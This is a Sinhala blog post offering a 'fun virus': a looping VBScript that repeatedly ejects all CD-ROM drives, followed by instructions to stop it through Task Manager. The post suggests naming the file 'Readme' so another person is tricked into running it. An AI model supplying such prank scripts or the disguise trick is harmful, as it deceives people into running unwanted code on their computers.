Powered by Blogger.

CD rom එක eject වෙන විදියේ Virus එකක් හදමු. (Fun වැඩ)








 නිකං ඉන්න වෙලාවට fun එකට වගේ මෙකත් කරලා බලන්න. මුලින්ම Notepad එක open කරගෙන මේ code එක copy>paste කරගන්න.

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


දැන් save කරගන්න ඕන මේ විදියට. cdrom.vbs හෝ *.vbs දැන් double click කරන්න..
Readme වගේ නමක් දැම්මොත් අනිත් කෙනා අනිවා ලණුව කනවා.




මරු නේ වැඩේ.

 • දැන් මෙක නවත්තන්න task manager එකට (Ctrl+Alt+Del) යන්න
 • process tab එක මත click කරන්න



 • Select කරලා "Microsoft Windows Based Script Host" එකට හෝ "wscript.exe" එකට End process දෙන්න....

 මේ වගේ Notepad එකෙන් කරන්න පුලුවන් තව ගොඩාක් වැඩ තියෙනවා . මං පුලු පුලුවන් වෙලාවට ඔයාලට එවා ගැන කියලා දෙන්නම්. Notepad එක නිකං වැඩකට නැති දෙයක් කියලා අපිට හිතුනට ඒකෙන්  කරන්න පුලුවන් වැඩ දැක්කම ඔයාලට පුදුමත් හිතේවි. සයිබර් අවකාශයත් එක්කම දිකටම එකතු වෙල ඉන්න.. මම ලගදිම ඒ ගැනත් කියන්නම්.

 නමිදු සංචිල (undergraduate Bsc.SEng)

FIND ON ME FACEBOOK 

Share on Google Plus

About Unknown

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment